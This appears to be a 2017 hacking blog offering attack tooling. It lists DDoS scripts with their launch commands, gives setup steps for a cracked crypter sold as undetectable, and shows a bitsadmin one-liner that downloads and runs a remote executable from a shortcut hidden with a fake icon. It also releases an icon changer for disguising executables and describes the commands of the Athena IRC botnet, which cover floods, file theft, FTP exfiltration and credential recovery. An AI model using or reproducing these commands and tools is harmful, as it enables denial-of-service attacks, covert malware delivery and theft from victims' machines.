Tuesday, June 20, 2017

DDoS Scripts [Layer 7 & 4]

Hello Everybody,

I am giving you all my DDoS scripts using Layer 7 & Layer 4 attacks.
Please give a like as I worked very hard to bring you these scripts!
Thanks Enjoy Surprised

Layer 7
1: ARME (For Apache Servers) 

 /arme 127.0.0.1 5000 proxies.txt 3600 0
2: GHP (Get / Head / Post )

 ./ghp 127.0.0.1 GET 5000 proxies.txt 3600 0 %random%
3: Hulk (Python)
python hulk.py 127.0.0.1
4: Rand (Perl)

perl rand.pl 127.0.0.1 3600
5: R.U.D.Y

./rudy 127.0.0.1 1 5000 proxies.txt 3600 0 %random%
6: SlowLoris

 ./slow 127.0.0.1 5000 proxies.txt 3600 0
7: XML-RPC Pingback (Perl) 

 perl xml.pl 127.0.01 10000 xmlrpc.txt 3600
8: XML-RPC Pingback (PHP) 
php xml.php xml.txt 10000
9: 007 Goldeneye 
python 007.py 127.0.0.1
Layer 4
1: DNS AMP (UDP) 
./amp 127.0.0.1 80 amp.txt 2 3600 
2: CHARGEN
./chargen 127.0.0.1 80 chargen.txt 2 -1 3600 
3: TCP (Advanced ESSYN)
./tcp 127.0.0.1 80 2 -1 3600 
4: SNMP (Python Version)
./snmp -t 127.0.0.1 -f snmp.txt -l 30
5: Spoofed UDP 
./sudp 127.0.0.1 80 5 5 3600
6: NTP (Python)
python ntp.py 127.0.0.1 ntp.txt 5
7: NTP (Perl)
perl ntp.pl 127.0.0.1 80 3600 ntp.txt 5
8: DrDos 
perl drdos.pl 127.0.0.1 80 servers.txt 5 tcp 10 3600

I didn't coded any of these scripts.

Monday, June 19, 2017

TRILLIUM CRYPT RELOADED |FUD|NO DEPENDENCY|POLYMORPHIC|PROTECT PROCESS|Anti-MemScan



- Download this pack
- Unzip it in one folder
- Open the "OCX files" folder and run the exe
- Go to hosts file (c:\winddows\system32\drivers\etc) and add "127.0.0.1 electronicarts.pe.hu"
- Open HWID READER.exe
- Generate the hwid with random name (dosen't metter) and copy just the hwid (alphanumeric part like "BFEBFBFF000006FB1653284762")
- Copy it in the hwid.txt into the folder "area"
- Open mongoose you will find into the rar
- Right click on the icon you will find into system try and click on advanced setting
- Change the listeing_port to 80
- Restart mongoose
- Open the program and enjoy it!

I'm not 100% sure about the genuinity of the file I was provided, could be or could be not infected by the same cryter? I used a VM to crack it so be careful and use it you too!

DOWNLOAD AND EXECUTE (NEW METHOD 100% FUD)

It seems I'm the first who found such method to Download and Execute any files.
It was very obvious but seems nobody ever think about it.
First of all here is a demonstration video on youtube :


How it works ?

Well it simply use a shortcut to start a new Windows Shell with two command lines :

  • One to download a remote file
  • Second to execute the temporary downloaded file

Do it manually :
Just create a new shortcut, from your desktop then enter the following link :
cmd.exe /C "%windir%\system32\bitsadmin.exe /transfert downloader /priority normal http://example.com/test.exe %temp%\tmp.exe & %temp%\tmp.exe
As you can see, the shortcut will execute the Microsoft program bitsadmin in downloader mode to remote download a file and store in temp folder.

Then it will run it.

It is not finish, switch now the shortcut visibility to start minimized.

And you can change the icon with any icons you want (better use an icon index from shell32.dll located in system32 folder)

Have fun !

You can do lot of interesting thing with bitsadmin, I have many other methods to exploit file downloading using this techniques, will write other example later :)

Do it automatically (Lazy method):

As in the above video, download the attached application and voila !



[RELEASE] DARKZONE ICON CHANGER | 2 METHODS! [STABLE]

Hello. I just made this simple icon changer using delphi. It has 2 methods to support all executable files!
and of-course no dependencies to run so it will work on all Windows Machines.

DarkZone Icon Changer is a tool helps you to customize the icon file of an executable files (.exe)


Virus Total Scan (False Positive don't worry!)
https://www.virustotal.com/en/file/693e855b907fd2825806f56eb493581494f03bb72cfb30d8a460673ba7632d03/analysis/1481853463/

How to use:
--------------------------------------
1- Choose an executable file (.exe)
2- Choose an icon file (.ico)
3- Choose icon replacing method ( sometimes method
1 doesnt work so choose 2 and vise versa!)
4- Click Apply to make changes!
--------------------------------------

Download:
DarkZone - Icon Changer.rar
Rar Password: DarkZ0Ne.NET


Always check these MD5 and SHA1 hashes of: DarkZone Icon Changer.exe | to make sure its legit and not infected from another users/websites. ^^.
DarkZone Icon Changer.exe
MD5:F324AAB79F80F9BE3261CD5F5D36AA41
SHA1:56E968FD8FFD32B3BAB9A80264E1DFE9681E69DC

Enjoy ^^.

Sunday, June 18, 2017

Athena IRC Builder v2.4.0


Features of Athena
 - 10 Intense methods of DDoS
 - Anti-botkiller
 - Independent; requires no .NET framework or any 3rd party libraries
 - File searching and stealing system
 - SmartView (system for giving realistic looking views to your website or the like - ads, youtube, etc)
 - IRC War Attacks/Flooding
 - Multiple (different) methods of startup (registry and non-registry)
 - File, registry, and process persistence
 - Botkill (active botkilling, scans based on heuristics)

IRC Related Commands
!irc.join #channel [key] - Joins a channel
!irc.part #channel - Parts a channel
!irc.raw - Submit a RAW IRC command
!irc.reconnect - Reconnects to IRC after waiting 15 seconds
!irc.silent on/off - Toggles bot output to channel
!irc.sort.country - Separates bots based on location
!irc.sort.privelages - Separates bots based on Admin/User privelages
!irc.sort.gender - Separates laptops and desktops
!irc.sort.os - Separates bots based on operating system
!irc.sort.architecture - Separates bots based on architecture
!irc.sort.dotnet - Separates bots by version of .NET Framework installed

DDoS Commands
[Port 80 is most common for websites]
!ddos.http.slowloris - Attacks a target webserver with many concurrent connections
!ddos.http.rapidget - Sends mass amounts of randomized GET packets to a given target
!ddos.http.rudy - Slowly posts content by the masses to a target webserver
!ddos.http.rapidpost - Sends mass amounts of randomized POST packets to a given target
!ddos.http.slowpost – Holds many concurrent connections to a webserver through POST methods
!ddos.http.arme - Abuses partial content headers in order to harm a target webserver
!ddos.http.bandwith - This is a download based flood targetted torwards larger files and downloadable content on websites
!ddos.layer4.udp - Sends mass amounts of packets containing random data to a target host/ip
!ddos.layer4.ecf - Floods a target with rapid connections and disconnections (Previously named condis) (ECF stands for Established Connection Flooding)
!ddos.stop - Ends any currently running DDoS
(Example: !ddos.http.rapidget  http://website.com/ 80 300)

!ddos.browser http://website.com/ 60 - Floods a website through html scripts and hidden browsers. Effective against sites heavy on browser based scripts.
!ddos.browser.stop - Ends any currently running Browser Based DDoS

!http.hostblock website.com - Blocks a host
!http.status http://website.com/ - Outputs the current status of a given URL (ie. 200 OK, 302 Found, 404 Not Found, etc)


File Searching, Stealing, and Modification Commands
!ftp.upload C:\Archive.rar ftphost.com ftpuser ftppass - Uploads a given file to a given FTP server
!filesearch .exe - Searches entire bot computer for a given file name or piece of a file name, and outputs how many instances of it occured
!filesearch.output .rar - Functionality is the same as above, but the bot outputs the file path of the searched item
!filesearch.stop - Ends any of the existing three above types of file searches

Website View Commands
!view http://website.com/ - Views a given website in a random existing browser visibly
!view.hidden http://website.com/ - Views a given website in a random existing browser hidden
!smartview.add http://website.com/ 1080 300 - Adds a given URL to the 'SmartView' queue
!smartview.del http://website.com/ - Deletes a given URL from the 'SmartView' queue if it exists
!smartview.clear - Clears the entire 'SmartView' queue

Recovery Commands
!recovery.ftp – Outputs existing FTP logins on the bot computer
!recovery.im – Outputs existing IM logins on the bot computer

IRC War Commands
!war.connect irc.server.net 6667 – Connects to a given IRC in multiple sockets
!war.disconnect – Disconnects from a previously connected to IRC
!war.status – Outputs the amount of verified connections to IRC and the status of what the bot is currently doing
!war.raw PRIVMSG #channel :raw message – Submits a RAW IRC command
!war.join #channel channelkey – Joins a channel with an optional key
!war.part #channel part message – Parts a channel with an optional part message
!war.msg user/#channel message here – Sends a message to a given user or channel
!war.notice user/#channel message here – Sends a notice to a given user or channel
!war.invite user – Invites a user to a random channel. Clients that have auto-join on invite are affected badly
!war.ctcp user – Floods a user with CTCP requests. This often disconnects users
!war.dcc user – Floods a user with DCC requests. This often disconnects users
!war.kill.user nickname – Attempts to kill a user from IRC
!war.kill.user.multi nick1 nick2 nick3 - Attempts to kill a list of users from IRC
!war.flood.channel #channel – Floods a given channel
!war.flood.channel.hop #channel – Floods a channel through mass joins and parts
!war.flood.anope – Floods Anope services. Anope will crash if enough bots are used.
!war.stop – Stops an existing flood